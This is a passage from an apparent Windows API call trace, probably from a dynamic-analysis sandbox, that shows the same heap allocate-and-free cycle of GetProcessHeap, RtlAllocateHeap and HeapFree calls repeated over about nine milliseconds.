0x4f10000 [0060.914] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.914] GetProcessHeap () returned 0x4f10000 [0060.914] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.914] GetProcessHeap () returned 0x4f10000 [0060.914] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.914] GetProcessHeap () returned 0x4f10000 [0060.914] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.914] GetProcessHeap () returned 0x4f10000 [0060.914] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.914] GetProcessHeap () returned 0x4f10000 [0060.914] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.914] GetProcessHeap () returned 0x4f10000 [0060.914] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.914] GetProcessHeap () returned 0x4f10000 [0060.914] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.914] GetProcessHeap () returned 0x4f10000 [0060.914] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.914] GetProcessHeap () returned 0x4f10000 [0060.914] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.914] GetProcessHeap () returned 0x4f10000 [0060.914] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.914] GetProcessHeap () returned 0x4f10000 [0060.914] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.914] GetProcessHeap () returned 0x4f10000 [0060.914] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.914] GetProcessHeap () returned 0x4f10000 [0060.914] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.914] GetProcessHeap () returned 0x4f10000 [0060.914] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.914] GetProcessHeap () returned 0x4f10000 [0060.914] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.914] GetProcessHeap () returned 0x4f10000 [0060.914] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.914] GetProcessHeap () returned 0x4f10000 [0060.914] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.915] GetProcessHeap () returned 0x4f10000 [0060.915] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.915] GetProcessHeap () returned 0x4f10000 [0060.915] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.915] GetProcessHeap () returned 0x4f10000 [0060.915] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.915] GetProcessHeap () returned 0x4f10000 [0060.915] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.915] GetProcessHeap () returned 0x4f10000 [0060.915] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.915] GetProcessHeap () returned 0x4f10000 [0060.915] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.915] GetProcessHeap () returned 0x4f10000 [0060.915] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.915] GetProcessHeap () returned 0x4f10000 [0060.915] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.915] GetProcessHeap () returned 0x4f10000 [0060.915] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.915] GetProcessHeap () returned 0x4f10000 [0060.915] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.915] GetProcessHeap () returned 0x4f10000 [0060.915] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.915] GetProcessHeap () returned 0x4f10000 [0060.915] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.915] GetProcessHeap () returned 0x4f10000 [0060.915] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.915] GetProcessHeap () returned 0x4f10000 [0060.915] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.915] GetProcessHeap () returned 0x4f10000 [0060.915] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.915] GetProcessHeap () returned 0x4f10000 [0060.915] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.915] GetProcessHeap () returned 0x4f10000 [0060.915] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.915] GetProcessHeap () returned 0x4f10000 [0060.915] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.915] GetProcessHeap () returned 0x4f10000 [0060.916] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.916] GetProcessHeap () returned 0x4f10000 [0060.916] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.916] GetProcessHeap () returned 0x4f10000 [0060.916] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.916] GetProcessHeap () returned 0x4f10000 [0060.916] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.916] GetProcessHeap () returned 0x4f10000 [0060.916] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.916] GetProcessHeap () returned 0x4f10000 [0060.916] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.916] GetProcessHeap () returned 0x4f10000 [0060.916] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.916] GetProcessHeap () returned 0x4f10000 [0060.916] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.916] GetProcessHeap () returned 0x4f10000 [0060.916] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.916] GetProcessHeap () returned 0x4f10000 [0060.916] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.916] GetProcessHeap () returned 0x4f10000 [0060.916] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.916] GetProcessHeap () returned 0x4f10000 [0060.916] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.916] GetProcessHeap () returned 0x4f10000 [0060.916] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.916] GetProcessHeap () returned 0x4f10000 [0060.916] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.916] GetProcessHeap () returned 0x4f10000 [0060.916] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.916] GetProcessHeap () returned 0x4f10000 [0060.916] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.916] GetProcessHeap () returned 0x4f10000 [0060.916] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.916] GetProcessHeap () returned 0x4f10000 [0060.916] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.916] GetProcessHeap () returned 0x4f10000 [0060.916] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.917] GetProcessHeap () returned 0x4f10000 [0060.917] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.917] GetProcessHeap () returned 0x4f10000 [0060.917] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.917] GetProcessHeap () returned 0x4f10000 [0060.917] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.917] GetProcessHeap () returned 0x4f10000 [0060.917] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.917] GetProcessHeap () returned 0x4f10000 [0060.917] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.917] GetProcessHeap () returned 0x4f10000 [0060.917] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.917] GetProcessHeap () returned 0x4f10000 [0060.917] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.917] GetProcessHeap () returned 0x4f10000 [0060.917] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.917] GetProcessHeap () returned 0x4f10000 [0060.917] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.917] GetProcessHeap () returned 0x4f10000 [0060.917] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.917] GetProcessHeap () returned 0x4f10000 [0060.917] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.917] GetProcessHeap () returned 0x4f10000 [0060.917] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.917] GetProcessHeap () returned 0x4f10000 [0060.917] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.917] GetProcessHeap () returned 0x4f10000 [0060.917] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.917] GetProcessHeap () returned 0x4f10000 [0060.917] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.917] GetProcessHeap () returned 0x4f10000 [0060.917] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.917] GetProcessHeap () returned 0x4f10000 [0060.917] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.917] GetProcessHeap () returned 0x4f10000 [0060.917] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.917] GetProcessHeap () returned 0x4f10000 [0060.917] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.918] GetProcessHeap () returned 0x4f10000 [0060.918] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.918] GetProcessHeap () returned 0x4f10000 [0060.918] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.918] GetProcessHeap () returned 0x4f10000 [0060.918] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.918] GetProcessHeap () returned 0x4f10000 [0060.918] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.918] GetProcessHeap () returned 0x4f10000 [0060.918] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.918] GetProcessHeap () returned 0x4f10000 [0060.918] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.918] GetProcessHeap () returned 0x4f10000 [0060.918] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.918] GetProcessHeap () returned 0x4f10000 [0060.918] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.918] GetProcessHeap () returned 0x4f10000 [0060.918] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.918] GetProcessHeap () returned 0x4f10000 [0060.918] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.918] GetProcessHeap () returned 0x4f10000 [0060.918] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.918] GetProcessHeap () returned 0x4f10000 [0060.918] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.918] GetProcessHeap () returned 0x4f10000 [0060.918] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.918] GetProcessHeap () returned 0x4f10000 [0060.918] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.918] GetProcessHeap () returned 0x4f10000 [0060.918] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.918] GetProcessHeap () returned 0x4f10000 [0060.918] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.918] GetProcessHeap () returned 0x4f10000 [0060.918] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.918] GetProcessHeap () returned 0x4f10000 [0060.918] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.918] GetProcessHeap () returned 0x4f10000 [0060.919] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.919] GetProcessHeap () returned 0x4f10000 [0060.919] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.919] GetProcessHeap () returned 0x4f10000 [0060.919] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.919] GetProcessHeap () returned 0x4f10000 [0060.919] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.919] GetProcessHeap () returned 0x4f10000 [0060.919] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.919] GetProcessHeap () returned 0x4f10000 [0060.919] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.919] GetProcessHeap () returned 0x4f10000 [0060.919] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.919] GetProcessHeap () returned 0x4f10000 [0060.919] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.919] GetProcessHeap () returned 0x4f10000 [0060.919] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.919] GetProcessHeap () returned 0x4f10000 [0060.919] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.919] GetProcessHeap () returned 0x4f10000 [0060.919] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.919] GetProcessHeap () returned 0x4f10000 [0060.919] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.919] GetProcessHeap () returned 0x4f10000 [0060.919] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.919] GetProcessHeap () returned 0x4f10000 [0060.919] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.919] GetProcessHeap () returned 0x4f10000 [0060.919] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.919] GetProcessHeap () returned 0x4f10000 [0060.919] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.919] GetProcessHeap () returned 0x4f10000 [0060.919] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.919] GetProcessHeap () returned 0x4f10000 [0060.919] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.919] GetProcessHeap () returned 0x4f10000 [0060.919] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.920] GetProcessHeap () returned 0x4f10000 [0060.920] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.920] GetProcessHeap () returned 0x4f10000 [0060.920] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.920] GetProcessHeap () returned 0x4f10000 [0060.920] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.920] GetProcessHeap () returned 0x4f10000 [0060.920] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.920] GetProcessHeap () returned 0x4f10000 [0060.920] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.920] GetProcessHeap () returned 0x4f10000 [0060.920] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.920] GetProcessHeap () returned 0x4f10000 [0060.920] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.920] GetProcessHeap () returned 0x4f10000 [0060.920] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.920] GetProcessHeap () returned 0x4f10000 [0060.920] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.920] GetProcessHeap () returned 0x4f10000 [0060.920] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.920] GetProcessHeap () returned 0x4f10000 [0060.920] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.920] GetProcessHeap () returned 0x4f10000 [0060.920] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.920] GetProcessHeap () returned 0x4f10000 [0060.920] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.920] GetProcessHeap () returned 0x4f10000 [0060.920] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.920] GetProcessHeap () returned 0x4f10000 [0060.920] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.920] GetProcessHeap () returned 0x4f10000 [0060.920] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.920] GetProcessHeap () returned 0x4f10000 [0060.920] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.920] GetProcessHeap () returned 0x4f10000 [0060.920] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.920] GetProcessHeap () returned 0x4f10000 [0060.921] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.921] GetProcessHeap () returned 0x4f10000 [0060.921] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.921] GetProcessHeap () returned 0x4f10000 [0060.921] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.921] GetProcessHeap () returned 0x4f10000 [0060.921] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.921] GetProcessHeap () returned 0x4f10000 [0060.921] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.921] GetProcessHeap () returned 0x4f10000 [0060.921] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.921] GetProcessHeap () returned 0x4f10000 [0060.921] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.921] GetProcessHeap () returned 0x4f10000 [0060.921] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.921] GetProcessHeap () returned 0x4f10000 [0060.921] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.921] GetProcessHeap () returned 0x4f10000 [0060.921] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.921] GetProcessHeap () returned 0x4f10000 [0060.921] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.921] GetProcessHeap () returned 0x4f10000 [0060.921] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.921] GetProcessHeap () returned 0x4f10000 [0060.921] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.921] GetProcessHeap () returned 0x4f10000 [0060.921] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.921] GetProcessHeap () returned 0x4f10000 [0060.921] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.921] GetProcessHeap () returned 0x4f10000 [0060.921] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.921] GetProcessHeap () returned 0x4f10000 [0060.921] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.921] GetProcessHeap () returned 0x4f10000 [0060.921] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.921] GetProcessHeap () returned 0x4f10000 [0060.921] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.921] GetProcessHeap () returned 0x4f10000 [0060.922] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.922] GetProcessHeap () returned 0x4f10000 [0060.922] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.922] GetProcessHeap () returned 0x4f10000 [0060.922] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.922] GetProcessHeap () returned 0x4f10000 [0060.922] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.922] GetProcessHeap () returned 0x4f10000 [0060.922] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.922] GetProcessHeap () returned 0x4f10000 [0060.922] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.922] GetProcessHeap () returned 0x4f10000 [0060.922] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.922] GetProcessHeap () returned 0x4f10000 [0060.922] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.922] GetProcessHeap () returned 0x4f10000 [0060.922] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.922] GetProcessHeap () returned 0x4f10000 [0060.922] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.922] GetProcessHeap () returned 0x4f10000 [0060.922] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.922] GetProcessHeap () returned 0x4f10000 [0060.922] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.922] GetProcessHeap () returned 0x4f10000 [0060.922] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.922] GetProcessHeap () returned 0x4f10000 [0060.922] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.922] GetProcessHeap () returned 0x4f10000 [0060.922] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.922] GetProcessHeap () returned 0x4f10000 [0060.922] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.922] GetProcessHeap () returned 0x4f10000 [0060.922] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.922] GetProcessHeap () returned 0x4f10000 [0060.922] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.922] GetProcessHeap () returned 0x4f10000 [0060.922] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.922] GetProcessHeap () returned 0x4f10000 [0060.923] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.923] GetProcessHeap () returned 0x4f10000 [0060.923] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.923] GetProcessHeap () returned 0x4f10000 [0060.923] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.923] GetProcessHeap () returned 0x4f10000 [0060.923] HeapFree (in: hHeap=0x4f10000, 